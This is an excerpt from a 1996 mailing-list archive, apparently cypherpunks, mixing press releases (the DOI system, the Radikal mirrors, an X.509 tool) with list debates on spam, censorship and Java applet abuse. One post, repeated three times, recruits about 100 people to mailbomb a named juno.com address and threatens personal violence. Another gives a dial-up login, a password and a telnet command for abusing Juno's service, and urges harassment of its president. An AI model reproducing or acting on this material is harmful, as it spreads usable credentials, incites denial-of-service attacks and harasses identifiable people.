involves the Association of American Publishers (AAP) and the Corporation for National Research Initiatives (CNRI), two organizations with which CNI collaborates from time to time, as well as o Reed Elsevier, Inc., the parent corporation of Elsevier Science B.V., a member of the CNI Task Force. Best, Paul Paul Evan Peters paul at cni.org Executive Director fax 202-872-0884 Coalition for Networked Information 202-296-5098 21 Dupont Circle ftp://ftp.cni.org/ Washington, DC 20036 gopher://gopher.cni.org:70/ USA http://www.cni.org/CNI.homepage.html CONTACT: Judith Platt: 202-232-3335, ext. 229 jplatt at publishers.org Washington, D.C. September 9, 1996 TEAM SELECTED TO DEVELOP DIGITAL OBJECT IDENTIFIER SYSTEM FOR PUBLISHING INDUSTRY The Association of American Publishers (AAP) today announced selection of the team that will develop a Digital Object Identifier (DOI) system for use by the publishing industry. The team, comprising R.R. Bowker, a division of Reed Elsevier, Inc., and the Corporation for National Research Initiatives (CNRI), was chosen following a competitive bidding process initiated last spring as part of AAP's all-out effort to promote development of systems for managing copyright in the digital environment. Copyright management is seen as the key to successful commercial use of the Internet by the publishing industry. The DOI project is the outgrowth of a year-long AAP initiative to identify the needs of the publishing industry to facilitate safe and successful commercial ventures on the Internet and in other networked environments. AAP's initial research revealed a fundamental need for a unique, unambiguous way to identify digital materials-- a type of "electronic license plate" for a "digital vehicle" traveling the information superhighway. The Digital Object Identifier system will serve that purpose. The Bowker/CNRI team will focus on three key areas during the first year: developing a numbering system for identifying digital objects created by publishers; creating an agency for assigning publisher numbers; and developing a network-based directory to link digital objects to their publisher. DOIs will be made accessible via a high-speed computer system developed by CNRI--a scalable, distributed system on the Internet, with open interfaces, allowing information about digital material to be retrieved almost instantaneously. R.R. Bowker will establish the agency for making publisher numbers and other related information available to any and all publishers. Since the DOI system uses open standards, publishers and other companies can build their own products and services based around DOIs. AAP President Nicholas Veliotes said that "In selecting the team to develop a DOI system, AAP is taking a major step forward in the search for viable, effective copyright management in the electronic environment. Our members see this as a top priority as the publishing industry positions itself for the new Century." Robert Badger (Springer Verlag NY), a member of AAP's Enabling Technologies Committee and head of its DOI task force, pointed out: "For people to buy and sell information on the Internet, the publishing community needs two things which this announcement sets in motion. First, we need a simple way to identify which piece of information is being purchased; that's what the number does. Second, we need an easy way for the reader to get current information about the digital object--and this system will accomplish that by directing the reader's question immediately to the right place in the publishing organization. It's more than just a Universal Product Code for information; it's a market-making mechanism." Robert Kahn, President of CNRI and a recognized pioneer in the development of the Internet, said "We are delighted that our technology was selected for this important application. It will provide a key component of the global information infrastructure and can serve as a model for information access across many sectors of the economy." R.R. Bowker's Publisher Peter Simon noted that "As the organization that runs the ISBN Agency in the United States, and the publisher of key tools for locating published materials (including the preeminent Books in Print database), we are very pleased to be contributing our experience and expertise to creating new standards for digital materials and facilitating commerce on the Internet for the publishing industry." The Association of American Publishers is the principal trade association of the U.S. book publishing industry. Its members publish hardcover and paperback books in every field, including general fiction and non-fiction, poetry, children's books, textbooks, Bibles, reference works, scientific, medical, technical, professional, and scholarly books and journals, and a range of educational materials for the elementary, secondary, postsecondary and professional markets. AAP members also produce computer software and electronic products and services, including online databases and CD-ROM. Among AAP's primary concerns is the protection of intellectual property rights at home and abroad, in all media. R.R. Bowker, a division of Reed Elsevier, Inc., is one of the foremost U.S. bibliographic publishers, providing reference information to libraries, booksellers, and publishers since 1872. Its Books in Print database is currently available in hard copy, CD-ROM, tape & site license, and online. In addition, Bowker is the independent agent in the U.S. for the International ISBN and SAN systems. The ISBN is an identification system for books and other media which allows for order processing by booksellers, libraries, universities, wholesalers and distributors. DOI project contact at Bowker is Maureen Adamson, Vice President, Business Development--(908) 665-2856; madamson at reedref.com. The Corporation for National Research Initiatives is an internationally recognized leader in information technology research and development, with particular strength in networking, large-scale information systems, and digital object infrastructure. A non-profit organization formed in 1986 to foster research and development for a national information infrastructure, CNRI has, since its inception, been actively engaged in the establishment of open, non-proprietary technological approaches for networked systems. DOI project contact at CNRI is Constance McLindon, Director, System Deployment--(703) 620-8990; mclindon at cnri.reston.va.us. From tank at xs4all.nl Wed Sep 11 18:56:05 1996 From: tank at xs4all.nl (tank) Date: Thu, 12 Sep 1996 09:56:05 +0800 Subject: Pressrelease SPG: About the digital Radikal Message-ID: <199609112206.AAA17575@xs2.xs4all.nl> Pressrelease Solidariteitsgroep Politieke Gevangenen (SPG)- (Solidaritygroup Political Prisoners) Amsterdam, September 9th , 1996. German Prosecution starts investigation into the digital Radikal. On monday the 2nd of september the BRD State Prosecution started an official investigation against 'unknown distributors' of the Radikal-magazine on the Internet. These 'unknown distributors' are suspected of violating the German law: Par. 129a Abs. 3 StGB : Recruiting for an illegal terrorist organisation, Par. 140 Nr. 2 StGB : Approval of criminal offences, Par. 130a Abs. 1 StGB : Calling for criminal acts. The digital version of the Radikal is accessible through computers in the Netherlands and the United States. Besides this legal investigation, the German BAW (prosecution office) has ordered German Internet Providers to block the access to the digital version of the Radikal. A number of providers and associations of providers has given in to this call. This means that all websites of XS4ALL-clients in the Netherlands and of DataRealm-clients in the USA. have been made inaccessible for German Internet users. In reaction to this German attempt to censor the Internet mirrorsites (identical copies) of the Radikal have been put on various computers throughout the world. Since December 1995 we, the Solidaritygroup Political Prisoners, have added the full edition of the in Germany illegal magazine Radikal to our homepage on the World Wide Web. On this moment major parts of number 153 and the full edition of number 154 are accessible through the World Wide Web. We decided to do this after a renewed attempt (one of many over the years) of the German authorities to silence the Radikal. The Radikal is a magazine made by and for the radical left movement in the BRD. The magazine was set up in the mid '70-ies as a means of communication between various left-wing organisations. After a series of homesearches, arrests and long-time prison sentences, it was clear for the makers that they couldn't continue the magazine on the same basis. It was decided then to make the future editions of the magazine outside the view of the German authorities. Because the German Prosecution couldn't localise the makers of Radikal, a short period of quietness followed in which no policeraids etc. took place. Than trouble started anew. This time it were not the makers of the magazine who were targeted, but the persons who sold the magazine, bookshops and infocafe's. Through the years there have been hundreds of policeraids, numerous arrests and many people have spent months and years in jail for 'supporting a terrorist organisation' (i.e. distribution of the Radikal). As a result of these experiences the distribution of the Radikal is no longer organised through bookshops etc., but through a underground network. Mid June 1995 the German Prosecution stroke again. All over Germany special units of the police stormed, often with drawn guns, a great number of houses and left-wing centres. Four people were arrested and charged with membership of a terrorist organisation (i.e. making and distributing the Radikal). Four others, who were not at home at the time of the police raid, went underground. An enormous amount of things were confiscated by the police. It was striking that the police especially looked for digital information. More than thousand floppydisc's and various computers were taken for further research. The people arrested were held in detention under remand for six months and were only released after payment of 20.000 DM bail p.p. and a whole set of conditions they had to comply with. Exactly one year after the raids on June 13 1996, three of the four persons in hiding (Uli, Jutta and Frank) turned themselves in. Supported by 250 sympathisers they reported themselves at a German court after a pressconference. (Matthes, the fourth person in hiding, stayed away, because he is also being charged with membership of the AIZ, the Anti Imperialist Cell's.) At the court the three persons were taken into detention under remand after which their lawyer filed a petition for immediate release on grounds of the fact that there was no reason that the suspects would again run away and that after one year there's no longer any risk that the suspects would destroy any evidence. The petition was only partially successful. On June 15 Uli and Jutta were released, again with a lot of conditions. They had to hand in their passports, had to report themselves three times a week at the police, were not allowed any contact with anybody against whom an investigation was going on with regard to the Radikal and they had to pay a bail of 20.000 DM each. Frank is until now held in isolation under aggravated circumstances. The Prosecution claims to have proof that he collaborated on the release of Radikal editions 153 & 154 during his period in hiding. Up till now his lawyers were not allowed look into his dossier. New actions against the Radical took place on June 17 this year when in a number of German cities again houses were searched by the police. This time persons suspected of having a subscription to the Radikal were targeted. By way of their payments they were accused of supporting a terrorist organisation. Besides this they were suspected of letting others read the Radikal (recruiting for a terrorist organisation). For us this was another reason to put the latest issue (154) of the Radikal again on the Internet. Despite the fact that we, the Solidaritygroup Political Prisoners (SPG) Amsterdam, declared before that we put the Radikal on Internet, the German Prosecution started an investigation against 'unknown persons'. This is a frequently used strategy. With an investigation on name, the Prosecution can only get permission to tap the phones etc. of a limited amount of people, while an investigation against 'persons unknown' gives them much more possibilities. With this in mind it wouldn't surprise us if one of these days in Germany the police will again kick in a lot of doors in relation with the investigation against us. The German Prosecution seems to be pretty confident at the moment and states that from the confiscated goods, they managed to compile a lot of information about the Radikal, her makers (m/f) and her structures. But we wonder if they are going to be equally confident about their actions against the digital Radikal. Censorship on the Internet creates best-sellers. With respect to the Internet this is a very important case. For the first time a European government tries to censor political news on the Internet. (Until now such action was only directed against porn on the Internet.) If the German Prosecution succeeds in their attempts to censor the Internet, the Radikal will be the first but definitely not the last. Fortunately there are many people active around the theme of censorship on the Internet and though they don't all support us ideologically, many declare themselves to sympathise with the struggle for the continuation of the Radikal on the Internet and accordingly place copies of the magazine on their Websites. On this moment the Radikal is already accessible through more than twenty addresses over the whole world. If the German Prosecution wants to sustain their attempts to block the digital Radikal they will have to block all these providers and will finally block Germany from the rest of the Internet. Read the Radikal now at: 1. http://burn.ucsd.edu/%7Eats/RADIKAL/ 2. http://www.jca.or.jp/~taratta/mirror/radikal/ 3. http://www.serve.com/~spg/ 4. http://huizen.dds.nl/~radikal 5. http://www.canucksoup.net/radikal/index.html 6. http://www.ecn.org/radikal 7. http://www.well.com/~declan/mirrors/ 8. http://www.connix.com/~harry/radikal/index.htm 9. http://www.ganesa.com/radikal/ 10. http://www.denhaag.org/~radikal 11. http://www.knooppunt.be/~daniel/radikal 12. http://emma.unm.edu/radikal 13. http://www.tacacs.com/radikal/" 14. http://www.dsvenlo.nl/vvd/radikal/ 15. http://www.why.net/home/static/radi 16. http://users.abcs.com/dockmstr/mirror/radikal/index.htm 17. http://www.xs4all.nl/~jeroenw/radikal/ 18. http://home.ipr.nl/~radikal/ 19. http://www.dreamy.demon.co.uk/occam/ 20. http://www.ibmpcug.co.uk/~irdial/live_free/ 21.http://zero.tolerance.org/radi/index.htm 22.http://www.meaning.com/library/radikal/ 23.http://www.xs4all.nl/~irmed/radikal/ 24.http://www.walli.uwasa.fi/~tviemero/radikal 25.http://www.sko.it/~sfede/radi/index.htm 26.http://www.bart.nl/~sz/index.html 27.http://bellp.med.yale.edu/index.htm 28.http://www.euronet.nl/users/funest/radi/index.htm And naturally as usual at: http://www.xs4all.nl/~tank/radikal/ >From here we want to wish Frank in prison and Matthes where ever he is lots of strength. The struggle continues !! Please write to Frank (he will probably be replaced to Koln soon). His temporary address is : Frank Grossinsky p/a Ermittlungsrichter Wolst am BGH Herrenstr.45a 76125 Karlsruhe Germany. (All post will be read and censored by the police!) 11-9-1996 Solidariteitsgroep Politieke Gevangenen, (SPG Amsterdam). tank at xs4all.nl http://www.xs4all.nl/~tank From paul at fatmans.demon.co.uk Wed Sep 11 19:04:05 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Thu, 12 Sep 1996 10:04:05 +0800 Subject: talker Message-ID: <842469316.4436.0@fatmans.demon.co.uk> CC`d to cypherpunks mailing list: I recieved this this afternoon (11/9/96), this has gone far enough, would anyone here care to join me in mailbombing this guy? just reply this mail to him at doom13 at juno.com about 100 times or so, if we get about 100 people to do this it should generate enough traffic to close his account down. my reply to his mail is at the bottom: > Listen up you son of a bitch! Don't fucker call me a peice of horse shit > you cocksucker or I'll mailbomb your ass so many times you won't even > think of replying. You don't know shit about my hacking mother fucker. > Fuck you and go suck on some media crypto pussy shit. Listen you spotty socially unskilled adolescent masturbator: Your petty and pathetic claims amuse me, I laugh at your worthless and dirty existance peon. What have you ever hacked, have you broken any encryption codes, have you found security weaknesses by new and ingenious methods, have you practised within the hacker ethic? I think not You are a *WANNABEE*, a punk who knows not the slightest thing about systems security, can`t code, and couldn`t hack his way out of a wet paper bag, your mailbombing threats are about as technical as you can get. in addition your flames show no linguistic creativity, just a bunch of crude words thrown together, get an education you trailer butt-fucker. Mailbomb me, go ahead punk, make my day, if you dare to even think about doing so I will kick your ass, I will hurt you in ways you cannot imagine, I have carried out vindictive personal vendettas before and will do so again if necessary. Go on, I dare you, I double dare you motherfucker. Yours with the greatest respect: Paul Bradley MbM Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From geoffw at precipice.V-site.net Wed Sep 11 19:06:33 1996 From: geoffw at precipice.V-site.net (Geoff White) Date: Thu, 12 Sep 1996 10:06:33 +0800 Subject: The saga of hipcrime's emailBot (fwd) Message-ID: ---------- Forwarded message ---------- Date: Wed, 11 Sep 1996 13:25:20 -0700 (PDT) From: Geoff White To: cyperpunks at toad.com Cc: Geoff White , Stark Raving Math Subject: The saga of hipcrime's emailBot Hi Folks, Some of you may know me as I was once on cypherpunks about 2 years ago, other pressing matters (like starting an ISDN ISP :) caused me to unsub but I've still been with you in spirit :) Anyway, I run Virtual Sites (v-site.net) Having been squeezed out of InterNex by various methods that we won't go into here. Anyway V-site primarily hosts web-space although we also have a bunch of ISDN and Frame Relay customers as well, but our primary business is web-hosting. Robert of hipcrime.com is a "customer" of mine, actually I gave him a free account so that he could learn Java, CGI and other forms of web programming, I do give accounts to groups, organizations and people who show promise and Roberts fractal creations are outstanding. anyway it's not my nature to be policeman and to look over the shoulder of my customers, as long as they don't draw attention to themselves I leave them alone. I was surprised that Robert brought such attention to himself the other day. I fully understand where you are coming from with rgards to the remailers being a "touchy situation" at best but also bear in mind that Robert has pointed out an important "weakness", Even though the website is no longer dispensing the offending applet, Javacode last forever, so the applets that are free will continue to work until they deleted. Since they reference the senmail daemon on tarnover.v-site.net, the only recourse that I have is to shutdown the sendmail daemon but other customers rely on that daemon for their businesses. So what is to be done? I think this exposes a serious problem with Java applets and with the remailing system. I'm willing to do my part to help stem the tide but bear in mind that this kind of thing can and will happen again unless a better way to guard against this type of thing is implemented. Geoff White WebMaster Virtual Sites From dlv at bwalk.dm.com Wed Sep 11 19:07:04 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 12 Sep 1996 10:07:04 +0800 Subject: Did someone from juno.com say "hacking"? Message-ID: <8Jy4TD1w165w@bwalk.dm.com> Attention wannabe hackers from juno.com: Wanna lose your juno account fast? call 1-800-575-4516 with a modem log in as junox13, password wiujuywe type ? for the list of commands... One interesting command that works is telnet x13.boston.juno.com 1793 /stream Another interesting number is 1-800-328-2427. They also have a load of local numbers. One call also call their tech support (voice) at 1-800-586-6889 One can e-mail Charles Ardai at president at juno.com and ask him to be added to the kiddie porn mailing list. The possibilities are endless. But hurry! The holes may be closed soon. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From nobody at flame.alias.net Wed Sep 11 19:26:42 1996 From: nobody at flame.alias.net (Anonymous) Date: Thu, 12 Sep 1996 10:26:42 +0800 Subject: HipCrime and Spam Message-ID: <199609112052.WAA02693@basement.replay.com> HipCrime wrote: > Be honest, all you really care about is something which > "threatens the existence" your little baby. I think you were referring to yourself, Robert. :) Since you don't seem to understand the concept of spam very well yet, try this little experiment: Go downtown to City Hall and post advertisements for your website on all the walls and doors. Be sure to put one on the Mayor's office and all the members of the City Council. If they complain, explain to them why they are weak-minded souls who can't remove unwanted messages. Go to the local art gallery and post your signs all over. Tell people that since your web site is an "art project", that you are posting EXACTLY on topic, to an "appropriate group". Ask, "So, what's your problem ?!?" Pass out survey forms. Ask people where they want to see advertisements. Go to these sites and spray-paint your http address. If people complain that you are "harassing" them, ask them why a whopping eighteen letters written on the wall is harassment. Tell them it's not *your* fault, that you're just doing what other people told you to. Explain how many trees you are saving by using spray-paint instead of paper. When the police handcuff you and take you away, complain that they are censoring you. Tell the judge that you want to sue the cops for violating your civil rights. While you're in jail, think about why what you did was wrong. From robert at precipice.v-site.net Wed Sep 11 19:32:24 1996 From: robert at precipice.v-site.net (HipCrime) Date: Thu, 12 Sep 1996 10:32:24 +0800 Subject: HipCrime and Spam Message-ID: <32372622.43F6@precipice.v-site.net> >Go downtown to City Hall and post advertisements for your website on >all the walls and doors. Be sure to put one on the Mayor's office and >all the members of the City Council. If they complain, explain to them >why they are weak-minded souls who can't remove unwanted messages. You guys OBVIOUSLY confuse reality with cyberspace. Grafitti is actual property damage. A message in an EmailBox is long, long way from being comparable. Let's make use of that "education" that seems to make you so proud. -- Security is mostly a superstition. It does not exist in nature, nor do the children of men as a whole experience it. Avoiding danger is no safer in the long run than outright exposure. Life is either a daring adventure, or nothing. -- Hellen Keller From stewarts at ix.netcom.com Wed Sep 11 19:42:02 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Thu, 12 Sep 1996 10:42:02 +0800 Subject: ISODE Consortium X.509 Certification system Message-ID: <199609112356.TAA16491@attrh1.attrh.att.com> 15 August 1996 ISODE Consortium Delivers an X.509 Certification Authority The ISODE Consortium has delivered a new security management tool, Caviar, designed to create and manage a Certification Authority (CA) for the deployment of the X.509 Authentication Framework. Caviar, a Tcl/Tk utility, enables an administrator to effectively manage public keys and certificates so that data transmission can be provided securely across networks. The tool allows the administrator to create a CA, to generate, locate and revoke certificates, to manipulate user keys, and to construct certificate revocation lists. Public key cryptography is widely used to deliver secure data transmission. The generation and control of public keys, however, require management, and for this purpose, X.509 describes the notion of a 'trusted' authority referred to as the Certification Authority. The CA is responsible for endorsing the identity of users whose details may be held in the X.500 Directory, and the CA issues a certificate to authenticate the user's name and public key. The Caviar tool, using an intuitive graphical user interface, enables an administrator to create and manage these certificates easily. Tcl/Tk is a graphical scripting language openly available from Sun Microsystems Laboratories. Scripting languages provide inherent flexibility and extensibility, and Tcl/Tk is portable to a wide range of UNIX (X Windows) and Microsoft (Windows) platforms. Behind the graphical user interface, Caviar has an underlying command mode tool kit, which can be used if individual commands may more easily integrate into operational environments. Furthermore, Tcl/Tk allows a high degree of customization, which enables ISODE Consortium customers to develop their own scripts and graphical user interfaces for specific applications based on Caviar. The ITU-T, through X.509, recommend strong authentication based on public key cryptosystems as the basis for providing secure services. The ISODE Consortium uses X.509 as the core of its security strategy. X.509 provides a flexible, scaleable and manageable algorithm-independent authentication infrastructure, which can be used as the basis for a wide range of security services such as message encryption and access control. The ISODE Consortium is the leading supplier of source technology for open messaging, directory and security services. The primary server products are an Internet/X.500 Directory Server, an Internet/X.400 Message Transfer Agent, and a Message Store. These products provide connectivity within and between organizations in a multi-vendor environment. The ISODE Consortium has a world-wide customer base of over 170 clients including some of the largest commercial value-added resellers, service providers and research organizations. For further information please contact: Gill Greenwood, International Marketing Communications Manager ISODE Consortium Limited, The Dome, The Square, Richmond, TW9 1DT, UK Telephone: +44 181 332 9091 Fax: +44 181 332 9019 Internet: g.greenwood at isode.com WWW: http://www.isode.com/ ISODE is a trademark of ISODE Consortium Limited UNIX is a registered trademark in the United States and other countries licensed exclusively through X/Open Company Limited. Microsoft is a registered trademark of Microsoft Corporation # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From mpd at netcom.com Wed Sep 11 19:43:47 1996 From: mpd at netcom.com (Mike Duvos) Date: Thu, 12 Sep 1996 10:43:47 +0800 Subject: Child porn as thoughtcrime Message-ID: <199609112051.NAA25165@netcom2.netcom.com> frantz at netcom.com (Bill Frantz) writes: > It seems to me that the logic of these answers would make > the movie, "Carried Away" illegal. According to a Boston > Globe review (reprinted in the local rag), "... his > character cheats on his longtime girlfriend with a new > student who's only 17, ..." Depending on how this is > depicted in the movie (Rated R), it seems to me that this > could go over Hatch's line. (BTW, the review rates the movie > 3 stars out of a possible 4.) This is an interesting point. There are a plethora of foreign films, and some domestic ones, which contain frontal nudity by persons under 18, as well as suggestions and sometimes even fairly explicit depictions of acts such as masturbation or sex between adolescents or (horrors) between an adolescent and an adult. None of these films has a rating worse than an (R) from the censors at the MPAA, and a lot of them have glowing reviews singing their praises by the likes of Siskel and Ebert, Judith Crist, and John Hartl. Paradoxically, the US Government has never prosecuted a mainstream film under child pornography laws, evidently feeling that this was a can of worms they didn't dare open, or at the very least, not wanting to risk losing the case and establishing a precedent So while people are getting prosecuted for a grainy computer picture they downloaded from the Internet, which some pediatric "expert" testifies "appears to depict a minor", such glowing cinematic moments such as the hardon comparison scene in Bernardo Bertolucci's "1900", or Jill Clayburgh masturbating her teenage son to orgasm in "Luna", are freely available to anyone who wants them, and even get shown on Premium Cable to boot. Not to mention the child nudity in films ranging from the ancient "Macbeth" to the adolescent boy loves boy epic "You Are Not Alone." Showtime must have run David Hamilton's "Tendres Cousines" at least a zillion times when it was first released, as well as prominently featuring it in their weekly softcore erotica slot, even though it featured the rather explicit seduction of a 14 year old boy by an older girl, complete with nudity, flushed cheeks, and panting orgasms. If the Hatch bill in one form or another passes, will the government still continue to ignore the art film market in its quest to stamp out depictions of child sex? How will the artistic community react when the feds start throwing people in jail, and burning the master prints of critically aclaimed films, under the excuse that the mere existence of such material "sexualizes" children and "encourages child abuse?" Should make for some interesting court tests. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From wic at gnn.com Wed Sep 11 19:47:32 1996 From: wic at gnn.com (wic at gnn.com) Date: Thu, 12 Sep 1996 10:47:32 +0800 Subject: Thanks! Message-ID: <9609112107.AA21781@ebay.gnn.com> Thanks for your message! As of August 1st, 1996, GNN Select has joined forces with WebCrawler to become WebCrawler Select. Our new URL is http://webcrawler.com/ Submissions to WebCrawler will also be considered for inclusion in WebCrawler Select. The WebCrawler submission form is available at: http://webcrawler.com/WebCrawler/SubmitURLS.html If you have a question, comment, or suggestion for us, bypass the submission form and send us mail at wc at webcrawler.com . We will get back to you as soon as we can. Best regards, Abbot Chambers Managing Editor WebCrawler Select ---------------------------------------------------------- From stewarts at ix.netcom.com Wed Sep 11 19:49:07 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Thu, 12 Sep 1996 10:49:07 +0800 Subject: Satellite Movement? Message-ID: <199609112356.TAA16477@attrh1.attrh.att.com> >Blak Dayz wrote: >> I was out buying groceries and after they scanned the shit through they >> told me that all the ATMs in the City were out due to connection problems. So i >> go home and start trying to scan for the shits and i cant find them. If anyone >> knows what the hell happened i would appreciate the details. I believe it may >> have been a solar flare that caused the companies to redirect their satellites. Alternatively, it may be that the host earth station that the VSAT providers uses was affected by the hurricane. But different ATM providers use different technologies for connecting their ATM networks, and may mix technologies if that's cheapest. VSATs are one approach, leased lines another (generally multidrop with ugly IBMish protocols), X.25 networks, frame relay networks, etc. Maybe all the ATM machines run by your bank were out. But taking out all the ATM machines in a money-using city like New York would require some major disaster, like a nuclear explosion or a stupid regulation written by a government official. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From saione at primenet.com Wed Sep 11 20:09:15 1996 From: saione at primenet.com (saione at primenet.com) Date: Thu, 12 Sep 1996 11:09:15 +0800 Subject: talker Message-ID: <199609120013.RAA23608@primenet.com> CC`d to cypherpunks mailing list: I recieved this this afternoon (11/9/96), this has gone far enough, would anyone here care to join me in mailbombing this guy? just reply this mail to him at doom13 at juno.com about 100 times or so, if we get about 100 people to do this it should generate enough traffic to close his account down. my reply to his mail is at the bottom: > Listen up you son of a bitch! Don't fucker call me a peice of horse shit > you cocksucker or I'll mailbomb your ass so many times you won't even > think of replying. You don't know shit about my hacking mother fucker. > Fuck you and go suck on some media crypto pussy shit. Listen you spotty socially unskilled adolescent masturbator: Your petty and pathetic claims amuse me, I laugh at your worthless and dirty existance peon. What have you ever hacked, have you broken any encryption codes, have you found security weaknesses by new and ingenious methods, have you practised within the hacker ethic? I think not You are a *WANNABEE*, a punk who knows not the slightest thing about systems security, can`t code, and couldn`t hack his way out of a wet paper bag, your mailbombing threats are about as technical as you can get. in addition your flames show no linguistic creativity, just a bunch of crude words thrown together, get an education you trailer butt-fucker. Mailbomb me, go ahead punk, make my day, if you dare to even think about doing so I will kick your ass, I will hurt you in ways you cannot imagine, I have carried out vindictive personal vendettas before and will do so again if necessary. Go on, I dare you, I double dare you motherfucker. Yours with the greatest respect: Paul Bradley MbM Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From Adamsc at io-online.com Wed Sep 11 20:09:28 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 12 Sep 1996 11:09:28 +0800 Subject: Hacking Mobil Telephone System ? Message-ID: <19960911210106453.AAA160@IO-ONLINE.COM> On Wed, 11 Sep 1996 14:00:24 +0200 (MET DST), Stephan Schmidt wrote: >If a hacker is able to phone using the number >0171 / 3 28 99 66 in Germany with a hacked code, >the company will pay 100.000 DM (~65.000$) to a non >profit organisation of the hackers choice. ^^^^^^^^^^^^^^^^^^ I'm setting up a nonprofit organization: The Chris Adams PentiumPRO Fund. Please support it! Seems like a fake test. If they were giving out $64k to the hacker, you'd see a LOT of intrest! Hackers just tend not to be the most concerned with the problems of others... # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From bdavis at thepoint.net Wed Sep 11 20:23:30 1996 From: bdavis at thepoint.net (Brian Davis) Date: Thu, 12 Sep 1996 11:23:30 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: Message-ID: On Wed, 11 Sep 1996, jonathon wrote: > On Wed, 11 Sep 1996, Gary Howland wrote: > > > > But the public *is* asked to assent to those methods - your chance to vote > > > on them is known colloquially as "jury duty". > > But judges have said that Jury Nullification is not acceptable > legal practice. And other judges have said the opposite. EBD ... From saione at primenet.com Wed Sep 11 20:29:02 1996 From: saione at primenet.com (saione at primenet.com) Date: Thu, 12 Sep 1996 11:29:02 +0800 Subject: talker Message-ID: <199609120013.RAA23678@primenet.com> CC`d to cypherpunks mailing list: I recieved this this afternoon (11/9/96), this has gone far enough, would anyone here care to join me in mailbombing this guy? just reply this mail to him at doom13 at juno.com about 100 times or so, if we get about 100 people to do this it should generate enough traffic to close his account down. my reply to his mail is at the bottom: > Listen up you son of a bitch! Don't fucker call me a peice of horse shit > you cocksucker or I'll mailbomb your ass so many times you won't even > think of replying. You don't know shit about my hacking mother fucker. > Fuck you and go suck on some media crypto pussy shit. Listen you spotty socially unskilled adolescent masturbator: Your petty and pathetic claims amuse me, I laugh at your worthless and dirty existance peon. What have you ever hacked, have you broken any encryption codes, have you found security weaknesses by new and ingenious methods, have you practised within the hacker ethic? I think not You are a *WANNABEE*, a punk who knows not the slightest thing about systems security, can`t code, and couldn`t hack his way out of a wet paper bag, your mailbombing threats are about as technical as you can get. in addition your flames show no linguistic creativity, just a bunch of crude words thrown together, get an education you trailer butt-fucker. Mailbomb me, go ahead punk, make my day, if you dare to even think about doing so I will kick your ass, I will hurt you in ways you cannot imagine, I have carried out vindictive personal vendettas before and will do so again if necessary. Go on, I dare you, I double dare you motherfucker. Yours with the greatest respect: Paul Bradley MbM Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From eb at comsec.com Wed Sep 11 20:41:59 1996 From: eb at comsec.com (Eric Blossom) Date: Thu, 12 Sep 1996 11:41:59 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609070220.WAA01026@wauug.erols.com> Message-ID: <199609112344.QAA02699@comsec.com> > Try and pay cash in most Fedex offices. Not a problem in my neighborhood, but I do notice that they write "CASH" in large letters on the airbill. I suppose that this gets the package extra attention. From watson at tds.com Wed Sep 11 20:50:03 1996 From: watson at tds.com (watson at tds.com) Date: Thu, 12 Sep 1996 11:50:03 +0800 Subject: Court challenge to AOL junk-mail blocks Message-ID: <199609112133.OAA08338@mailman.tds.com> NetSurfer said: If you know a valid email address on the spammers system you can always bounce each message back to them. If enough people turned the messages back on them it might give them the opportunity to experience first hand what its like to receive tons of mail you don't want or need... Doesn't seem to work that well. The "green card lawyers" were reported to have received hate-mail in the hundreds of thousands. The happily waded through it all and pulled out a few valid replies who 